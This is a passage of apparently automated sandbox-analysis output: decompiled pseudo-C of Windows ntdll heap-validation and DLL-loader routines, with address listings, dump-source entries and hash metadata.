                                                                                                                                                    								if(_t311[0x13] != 0) {
                                                                                                                                                    									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
                                                                                                                                                    									 *_t281 =  *_t281 ^ _t311[0x14];
                                                                                                                                                    									__eflags =  *_t281;
                                                                                                                                                    								}
                                                                                                                                                    								_t314 =  *_t314;
                                                                                                                                                    								_t204 =  &(_t311[0x28]);
                                                                                                                                                    								continue;
                                                                                                                                                    							}
                                                                                                                                                    							_t209 = E009B579A(_t295, _t311, _t281);
                                                                                                                                                    							__eflags = _t209;
                                                                                                                                                    							if(_t209 == 0) {
                                                                                                                                                    								__eflags = _t311[0x13];
                                                                                                                                                    								if(_t311[0x13] != 0) {
                                                                                                                                                    									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
                                                                                                                                                    									_t95 = _t314 + 0x18;
                                                                                                                                                    									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
                                                                                                                                                    									__eflags =  *_t95;
                                                                                                                                                    								}
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							goto L41;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
                                                                                                                                                    							__eflags = _t214;
                                                                                                                                                    							if(_t214 == 0) {
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t214 & 0x00008000;
                                                                                                                                                    							if((_t214 & 0x00008000) == 0) {
                                                                                                                                                    								__eflags = _t214 & 0x00000800;
                                                                                                                                                    								if((_t214 & 0x00000800) != 0) {
                                                                                                                                                    									goto L39;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t214 - _t311[0x22];
                                                                                                                                                    								if(_t214 >= _t311[0x22]) {
                                                                                                                                                    									goto L39;
                                                                                                                                                    								}
                                                                                                                                                    								L38:
                                                                                                                                                    								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
                                                                                                                                                    								_t295 =  *(_t314 + 0x10) >> 3;
                                                                                                                                                    								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
                                                                                                                                                    								__eflags =  *_t216;
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							_t214 = _t214 & 0x00007fff;
                                                                                                                                                    							_t295 = 0x81;
                                                                                                                                                    							__eflags = _t214 - 0x81;
                                                                                                                                                    							if(_t214 >= 0x81) {
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							_t295 = _v8;
                                                                                                                                                    							goto L38;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_v20 = _v20 & 0x00000000;
                                                                                                                                                    					_v24 = _v24 & 0x00000000;
                                                                                                                                                    					_t282 =  &(_t311[0x2a]);
                                                                                                                                                    					_t315 =  *_t282;
                                                                                                                                                    					while(_t315 != _t282) {
                                                                                                                                                    						_t226 = L009CFDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
                                                                                                                                                    						__eflags = _t226;
                                                                                                                                                    						if(_t226 == 0) {
                                                                                                                                                    							goto L84;
                                                                                                                                                    						}
                                                                                                                                                    						_t315 =  *_t315;
                                                                                                                                                    					}
                                                                                                                                                    					_t316 = _a8;
                                                                                                                                                    					_v16 = _t311;
                                                                                                                                                    					if(_t316 == _v20) {
                                                                                                                                                    						__eflags = _t311[0x1e] - _v24;
                                                                                                                                                    						if(_t311[0x1e] == _v24) {
                                                                                                                                                    							_t228 = _v8;
                                                                                                                                                    							__eflags = _t228;
                                                                                                                                                    							if(_t228 == 0) {
                                                                                                                                                    								goto L74;
                                                                                                                                                    							}
                                                                                                                                                    							_t317 = _t311[0x30];
                                                                                                                                                    							__eflags = _t317;
                                                                                                                                                    							if(_t317 == 0) {
                                                                                                                                                    								L68:
                                                                                                                                                    								_t318 = _t311[0x23];
                                                                                                                                                    								__eflags = _t318;
                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                    									L73:
                                                                                                                                                    									_a4 = 0;
                                                                                                                                                    									E00934167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                                                                                                                                    									goto L74;
                                                                                                                                                    								}
                                                                                                                                                    								_t233 = _t311[0x22] & 0x0000ffff;
                                                                                                                                                    								_t284 = 1;
                                                                                                                                                    								_t308 = 1;
                                                                                                                                                    								__eflags = 1 - _t233;
                                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                                    									goto L73;
                                                                                                                                                    								}
                                                                                                                                                    								_t312 = _v12;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t309 = _t284 & 0x0000ffff;
                                                                                                                                                    									_t308 =  *(_t312 + _t309 * 4);
                                                                                                                                                    									_t318 = _t318 + 0x40;
                                                                                                                                                    									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
                                                                                                                                                    									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t284 = _t284 + 1;
                                                                                                                                                    									__eflags = _t284 - _t233;
                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                    										continue;
                                                                                                                                                    									}
                                                                                                                                                    									goto L73;
                                                                                                                                                    								}
                                                                                                                                                    								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    								__eflags =  *(_t235 + 0xc);
                                                                                                                                                    								if( *(_t235 + 0xc) == 0) {
                                                                                                                                                    									_push("HEAP: ");
                                                                                                                                                    									E0097373B();
                                                                                                                                                    								} else {
                                                                                                                                                    									E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    								}
                                                                                                                                                    								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
                                                                                                                                                    								_push(_t298);
                                                                                                                                                    								_push( *_t298);
                                                                                                                                                    								_t319 = _t318 + 0x10;
                                                                                                                                                    								__eflags = _t319;
                                                                                                                                                    								_push( *((intOrPtr*)(_t319 - 8)));
                                                                                                                                                    								_push(_t319);
                                                                                                                                                    								E0097373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
                                                                                                                                                    								goto L84;
                                                                                                                                                    							}
                                                                                                                                                    							_t286 = 1;
                                                                                                                                                    							__eflags = 1;
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t310 = _t286 & 0x0000ffff;
                                                                                                                                                    								_t308 =  *(_t228 + _t310 * 4);
                                                                                                                                                    								_t317 = _t317 + 0xc;
                                                                                                                                                    								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
                                                                                                                                                    								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_t286 = _t286 + 1;
                                                                                                                                                    								_t308 = 0x81;
                                                                                                                                                    								__eflags = _t286 - 0x81;
                                                                                                                                                    								if(_t286 < 0x81) {
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								goto L68;
                                                                                                                                                    							}
                                                                                                                                                    							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t246 + 0xc);
                                                                                                                                                    							if( *(_t246 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E0097373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
                                                                                                                                                    							_push( *((intOrPtr*)(_t317 + 8)));
                                                                                                                                                    							E0097373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
                                                                                                                                                    							goto L84;
                                                                                                                                                    						}
                                                                                                                                                    						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    						__eflags =  *(_t257 + 0xc);
                                                                                                                                                    						if( *(_t257 + 0xc) == 0) {
                                                                                                                                                    							_push("HEAP: ");
                                                                                                                                                    							E0097373B();
                                                                                                                                                    						} else {
                                                                                                                                                    							E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    						}
                                                                                                                                                    						_push(_t311[0x1e]);
                                                                                                                                                    						_push(_v24);
                                                                                                                                                    						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
                                                                                                                                                    						L57:
                                                                                                                                                    						E0097373B();
                                                                                                                                                    						goto L84;
                                                                                                                                                    					}
                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
                                                                                                                                                    						_push("HEAP: ");
                                                                                                                                                    						E0097373B();
                                                                                                                                                    					} else {
                                                                                                                                                    						E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    					}
                                                                                                                                                    					_push(_t316);
                                                                                                                                                    					_push(_v20);
                                                                                                                                                    					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                                                                                                    					goto L57;
                                                                                                                                                    				} else {
                                                                                                                                                    					L74:
                                                                                                                                                    					return 1;
                                                                                                                                                    				}
                                                                                                                                                    			}












































                                                                                                                                                    0x009d0d58
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d5a
                                                                                                                                                    0x009d0d5b
                                                                                                                                                    0x009d0d5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d5e
                                                                                                                                                    0x009d0ddb
                                                                                                                                                    0x009d0dde
                                                                                                                                                    0x009d0de1
                                                                                                                                                    0x009d0e03
                                                                                                                                                    0x009d0e08
                                                                                                                                                    0x009d0de3
                                                                                                                                                    0x009d0dfb
                                                                                                                                                    0x009d0e00
                                                                                                                                                    0x009d0e11
                                                                                                                                                    0x009d0e14
                                                                                                                                                    0x009d0e15
                                                                                                                                                    0x009d0e17
                                                                                                                                                    0x009d0e17
                                                                                                                                                    0x009d0e1a
                                                                                                                                                    0x009d0e1d
                                                                                                                                                    0x009d0e24
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0e29
                                                                                                                                                    0x009d0d14
                                                                                                                                                    0x009d0d14
                                                                                                                                                    0x009d0d15
                                                                                                                                                    0x009d0d15
                                                                                                                                                    0x009d0d18
                                                                                                                                                    0x009d0d1b
                                                                                                                                                    0x009d0d1e
                                                                                                                                                    0x009d0d21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d23
                                                                                                                                                    0x009d0d24
                                                                                                                                                    0x009d0d29
                                                                                                                                                    0x009d0d2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d2c
                                                                                                                                                    0x009d0d86
                                                                                                                                                    0x009d0d89
                                                                                                                                                    0x009d0d8c
                                                                                                                                                    0x009d0dae
                                                                                                                                                    0x009d0db3
                                                                                                                                                    0x009d0d8e
                                                                                                                                                    0x009d0da6
                                                                                                                                                    0x009d0dab
                                                                                                                                                    0x009d0dbf
                                                                                                                                                    0x009d0dc2
                                                                                                                                                    0x009d0dcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0dd0
                                                                                                                                                    0x009d0cbe
                                                                                                                                                    0x009d0cc1
                                                                                                                                                    0x009d0cc5
                                                                                                                                                    0x009d0ce7
                                                                                                                                                    0x009d0cec
                                                                                                                                                    0x009d0cc7
                                                                                                                                                    0x009d0cdf
                                                                                                                                                    0x009d0ce4
                                                                                                                                                    0x009d0cf2
                                                                                                                                                    0x009d0cf5
                                                                                                                                                    0x009d0cf8
                                                                                                                                                    0x009d0ca3
                                                                                                                                                    0x009d0ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0ca8
                                                                                                                                                    0x009d0c6d
                                                                                                                                                    0x009d0c8f
                                                                                                                                                    0x009d0c94
                                                                                                                                                    0x009d0c6f
                                                                                                                                                    0x009d0c87
                                                                                                                                                    0x009d0c8c
                                                                                                                                                    0x009d0c9a
                                                                                                                                                    0x009d0c9b
                                                                                                                                                    0x009d0c9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d77
                                                                                                                                                    0x009d0d77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d0d77

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                                                                    • API String ID: 0-3316276410
                                                                                                                                                    • Opcode ID: 530798fa8c0ab87fd30604c587608fbce6aae08c6442a4b66bbe231d626d05b3
                                                                                                                                                    • Instruction ID: fc4c32d987f2433eb9dd27dcdcd72e593301a96bfe7da2661c2fec47e9384c0d
                                                                                                                                                    • Opcode Fuzzy Hash: 530798fa8c0ab87fd30604c587608fbce6aae08c6442a4b66bbe231d626d05b3
                                                                                                                                                    • Instruction Fuzzy Hash: 67F1E171640685AFDB24CF64C480FAAB7F9FF84714F54C45AE8899B782C734AE44DBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E0093E6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                    				signed int _t254;
                                                                                                                                                    				signed int _t257;
                                                                                                                                                    				signed int _t258;
                                                                                                                                                    				signed int _t260;
                                                                                                                                                    				signed int _t261;
                                                                                                                                                    				signed int _t263;
                                                                                                                                                    				signed int _t288;
                                                                                                                                                    				signed int _t290;
                                                                                                                                                    				signed int _t299;
                                                                                                                                                    				intOrPtr _t300;
                                                                                                                                                    				intOrPtr _t303;
                                                                                                                                                    				intOrPtr _t304;
                                                                                                                                                    				intOrPtr* _t319;
                                                                                                                                                    				intOrPtr* _t320;
                                                                                                                                                    				intOrPtr* _t321;
                                                                                                                                                    				intOrPtr _t324;
                                                                                                                                                    				signed int _t328;
                                                                                                                                                    				intOrPtr _t331;
                                                                                                                                                    				intOrPtr* _t332;
                                                                                                                                                    				signed short _t333;
                                                                                                                                                    				signed int _t336;
                                                                                                                                                    				intOrPtr _t347;
                                                                                                                                                    				signed int _t348;
                                                                                                                                                    				intOrPtr _t355;
                                                                                                                                                    				signed int _t376;
                                                                                                                                                    				signed int _t378;
                                                                                                                                                    				signed int _t380;
                                                                                                                                                    				signed short* _t388;
                                                                                                                                                    				signed short* _t390;
                                                                                                                                                    				signed int _t391;
                                                                                                                                                    				signed int _t401;
                                                                                                                                                    				intOrPtr _t403;
                                                                                                                                                    				intOrPtr* _t405;
                                                                                                                                                    				signed int _t406;
                                                                                                                                                    				intOrPtr _t407;
                                                                                                                                                    				signed int _t410;
                                                                                                                                                    				signed int _t411;
                                                                                                                                                    				intOrPtr* _t414;
                                                                                                                                                    				intOrPtr* _t416;
                                                                                                                                                    				signed int _t417;
                                                                                                                                                    				intOrPtr* _t418;
                                                                                                                                                    				void* _t419;
                                                                                                                                                    				void* _t421;
                                                                                                                                                    				void* _t422;
                                                                                                                                                    
                                                                                                                                                    				_push(0xb4);
                                                                                                                                                    				_push(0x92be58);
                                                                                                                                                    				L0092DF5C(__ebx, __edi, __esi);
                                                                                                                                                    				_t254 =  *0x92f78c; // 0x8
                                                                                                                                                    				_t416 =  *((intOrPtr*)(_t421 + 0xc));
                                                                                                                                                    				if(( *0xa077a0 & (_t254 | 0x00000001)) != 0) {
                                                                                                                                                    					_push(_t416);
                                                                                                                                                    					L0099F970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
                                                                                                                                                    					_t422 = _t422 + 0x1c;
                                                                                                                                                    				}
                                                                                                                                                    				_t257 =  *0xa077a0; // 0x0
                                                                                                                                                    				if(( *0x92f790 & _t257) != 0) {
                                                                                                                                                    					asm("int3");
                                                                                                                                                    				}
                                                                                                                                                    				_t410 = 0;
                                                                                                                                                    				 *(_t421 - 0x24) = 0;
                                                                                                                                                    				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
                                                                                                                                                    				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
                                                                                                                                                    				 *(_t421 - 0x28) = 0;
                                                                                                                                                    				 *(_t421 + 0xf) = 0;
                                                                                                                                                    				_t401 = 0;
                                                                                                                                                    				if( *(_t421 + 0x18) != 0) {
                                                                                                                                                    					_t258 = L0092FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
                                                                                                                                                    					__eflags = _t258;
                                                                                                                                                    					if(_t258 != 0) {
                                                                                                                                                    						goto L13;
                                                                                                                                                    					}
                                                                                                                                                    					_t411 = L00941A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
                                                                                                                                                    					__eflags = _t411;
                                                                                                                                                    					if(_t411 < 0) {
                                                                                                                                                    						goto L14;
                                                                                                                                                    					}
                                                                                                                                                    					_t411 = L00941AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
                                                                                                                                                    					__eflags = _t411;
                                                                                                                                                    					if(_t411 < 0) {
                                                                                                                                                    						E0092E1C6(_t421 - 0x3c);
                                                                                                                                                    						goto L14;
                                                                                                                                                    					}
                                                                                                                                                    					 *(_t421 - 0x24) = 0x10000000;
                                                                                                                                                    					goto L84;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t388 =  *(_t421 + 8);
                                                                                                                                                    					_t402 = _t388[2];
                                                                                                                                                    					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
                                                                                                                                                    					while(_t390 >= _t402) {
                                                                                                                                                    						_t406 =  *_t390 & 0x0000ffff;
                                                                                                                                                    						if(_t406 == 0x5c || _t406 == 0x2f) {
                                                                                                                                                    							 *(_t421 + 0xf) = 1;
                                                                                                                                                    							break;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t390 = _t390;
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					__eflags =  *(_t421 + 0xf);
                                                                                                                                                    					if( *(_t421 + 0xf) == 0) {
                                                                                                                                                    						_t391 = L0092FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
                                                                                                                                                    						__eflags = _t391;
                                                                                                                                                    						if(_t391 != 0) {
                                                                                                                                                    							L13:
                                                                                                                                                    							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                                                                                                                                    							_t411 = 0;
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							L14:
                                                                                                                                                    							_t260 =  *0x92f798; // 0x8
                                                                                                                                                    							_t261 = _t260 | 0x00000001;
                                                                                                                                                    							__eflags =  *0xa077a0 & _t261;
                                                                                                                                                    							if(( *0xa077a0 & _t261) != 0) {
                                                                                                                                                    								L0099F970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
                                                                                                                                                    							}
                                                                                                                                                    							_t263 =  *0xa077a0; // 0x0
                                                                                                                                                    							__eflags =  *0x92f79c & _t263;
                                                                                                                                                    							if(( *0x92f79c & _t263) != 0) {
                                                                                                                                                    								asm("int3");
                                                                                                                                                    							}
                                                                                                                                                    							return L0092DFA1(_t411);
                                                                                                                                                    						}
                                                                                                                                                    						_t411 = L0093FBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
                                                                                                                                                    						__eflags = _t411;
                                                                                                                                                    						if(_t411 < 0) {
                                                                                                                                                    							__eflags = _t411 - 0xc0000135;
                                                                                                                                                    							if(_t411 == 0xc0000135) {
                                                                                                                                                    								_t410 = 0;
                                                                                                                                                    								goto L10;
                                                                                                                                                    							}
                                                                                                                                                    							goto L14;
                                                                                                                                                    						}
                                                                                                                                                    						L19:
                                                                                                                                                    						_t290 = E0092E893(_t421 - 0x48, 0x93ed64, 1);
                                                                                                                                                    						__eflags = _t290;
                                                                                                                                                    						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
                                                                                                                                                    						_t411 = L0093BC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
                                                                                                                                                    						_t401 = 0;
                                                                                                                                                    						__eflags = _t411;
                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                    							L29:
                                                                                                                                                    							E0091F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                                                                                                                                    							__eflags =  *(_t421 - 0x28) - _t401;
                                                                                                                                                    							if( *(_t421 - 0x28) == _t401) {
                                                                                                                                                    								L32:
                                                                                                                                                    								E0092E025(_t402,  *0xa00104, 0,  *((intOrPtr*)(_t421 - 0x30)));
                                                                                                                                                    								goto L14;
                                                                                                                                                    							}
                                                                                                                                                    							L30:
                                                                                                                                                    							E0091F9F0( *(_t421 - 0x28));
                                                                                                                                                    							L31:
                                                                                                                                                    							E0092E1C6(_t421 - 0x3c);
                                                                                                                                                    							goto L32;
                                                                                                                                                    						}
                                                                                                                                                    						 *(_t421 + 0x18) = _t411;
                                                                                                                                                    						_push(_t421 - 0x20);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push( *((intOrPtr*)(_t421 - 0x54)));
                                                                                                                                                    						_push( *((intOrPtr*)(_t421 - 0x1c)));
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_t411 = E0092F535(_t411, _t416, __eflags);
                                                                                                                                                    						__eflags = _t411;
                                                                                                                                                    						if(_t411 < 0) {
                                                                                                                                                    							L28:
                                                                                                                                                    							_push( *((intOrPtr*)(_t421 - 0x1c)));
                                                                                                                                                    							E0091FC90(0xffffffff);
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags =  *(_t421 + 0xf);
                                                                                                                                                    						if( *(_t421 + 0xf) != 0) {
                                                                                                                                                    							_t299 = E00941603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
                                                                                                                                                    							__eflags = _t299;
                                                                                                                                                    							if(_t299 == 0) {
                                                                                                                                                    								goto L22;
                                                                                                                                                    							}
                                                                                                                                                    							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                                                                                                                                    							_t411 = 0;
                                                                                                                                                    							goto L28;
                                                                                                                                                    						}
                                                                                                                                                    						L22:
                                                                                                                                                    						__eflags =  *0xa000d8 - 0x2000;
                                                                                                                                                    						if( *0xa000d8 == 0x2000) {
                                                                                                                                                    							_t402 = 0x10b;
                                                                                                                                                    							_t300 =  *((intOrPtr*)(_t421 - 0x20));
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
                                                                                                                                                    							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
                                                                                                                                                    								goto L23;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
                                                                                                                                                    							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
                                                                                                                                                    								goto L23;
                                                                                                                                                    							}
                                                                                                                                                    							_push(_t401);
                                                                                                                                                    							_push(0x30);
                                                                                                                                                    							_push(_t421 - 0xc4);
                                                                                                                                                    							_push(1);
                                                                                                                                                    							E00920060( *((intOrPtr*)(_t421 - 0x2c)));
                                                                                                                                                    							__eflags =  *(_t421 - 0xa1) & 0x00000008;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								goto L23;
                                                                                                                                                    							}
                                                                                                                                                    							 *(_t421 - 4) = _t401;
                                                                                                                                                    							_t411 = L009A5F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
                                                                                                                                                    							 *(_t421 - 0x70) = _t411;
                                                                                                                                                    							 *(_t421 - 4) = 0xfffffffe;
                                                                                                                                                    							__eflags = _t411 - _t401;
                                                                                                                                                    							if(_t411 >= _t401) {
                                                                                                                                                    								goto L23;
                                                                                                                                                    							} else {
                                                                                                                                                    								goto L28;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L23:
                                                                                                                                                    						_t417 = E0092F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
                                                                                                                                                    						 *(_t421 - 0x58) = _t417;
                                                                                                                                                    						__eflags = _t417 - _t401;
                                                                                                                                                    						if(_t417 != _t401) {
                                                                                                                                                    							__eflags =  *(_t417 + 0x10) & 0x00000001;
                                                                                                                                                    							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
                                                                                                                                                    								goto L24;
                                                                                                                                                    							}
                                                                                                                                                    							_t380 = E0095855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
                                                                                                                                                    							_t411 = _t380;
                                                                                                                                                    							__eflags = _t411 - _t401;
                                                                                                                                                    							if(_t411 < _t401) {
                                                                                                                                                    								goto L28;
                                                                                                                                                    							} else {
                                                                                                                                                    								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
                                                                                                                                                    								 *(_t421 + 0x18) = _t380;
                                                                                                                                                    								goto L24;
                                                                                                                                                    							}
                                                                                                                                                    							L73:
							_t336 =  *(_t421 - 0x58);
							__eflags =  *(_t336 + 0x10) & 0x00000001;
							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
								L45:
								_t411 = 0;
								L0093EF95(_t418, 1, 0);
								E0091F9F0( *((intOrPtr*)(_t421 - 0x2c)));
								__eflags =  *(_t421 - 0x28);
								if( *(_t421 - 0x28) != 0) {
									E0091F9F0( *(_t421 - 0x28));
									E0092E1C6(_t421 - 0x3c);
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
								goto L14;
							}
							_t411 = E0095855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							__eflags = _t411;
							if(_t411 < 0) {
								E0092E025(_t402,  *0xa00104, 0, _t418);
								_t401 = 0;
								__eflags = 0;
								L121:
								__eflags =  *(_t421 - 0x24) & 0x00400000;
								if(__eflags != 0) {
									E009A0010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
								}
								goto L28;
							}
							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
							goto L45;
						}
						L24:
						__eflags =  *(_t421 + 0x18) - 0x4000000e;
						if(__eflags != 0) {
							__eflags =  *(_t421 + 0x14) & 0x00800000;
							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
								L117:
								_t303 =  *((intOrPtr*)(_t421 - 0x20));
								L33:
								_t402 = 0x2000;
								__eflags =  *(_t303 + 0x16) & 0x00002000;
								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
									L35:
									_t304 =  *0xa00058; // 0x0
									_t418 = E0092E0C6( *0xa00104, _t304 + 0x40000, 0x78);
									__eflags = _t418 - _t401;
									if(_t418 == _t401) {
										_t411 = 0xc0000017;
										goto L121;
									} else {
										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
										__eflags =  *(_t421 - 0x24) & 0x00000004;
										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
											 *(_t418 + 0x1c) = _t401;
										} else {
											_t347 =  *((intOrPtr*)(_t421 - 0x20));
											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
												_t348 = 0;
											} else {
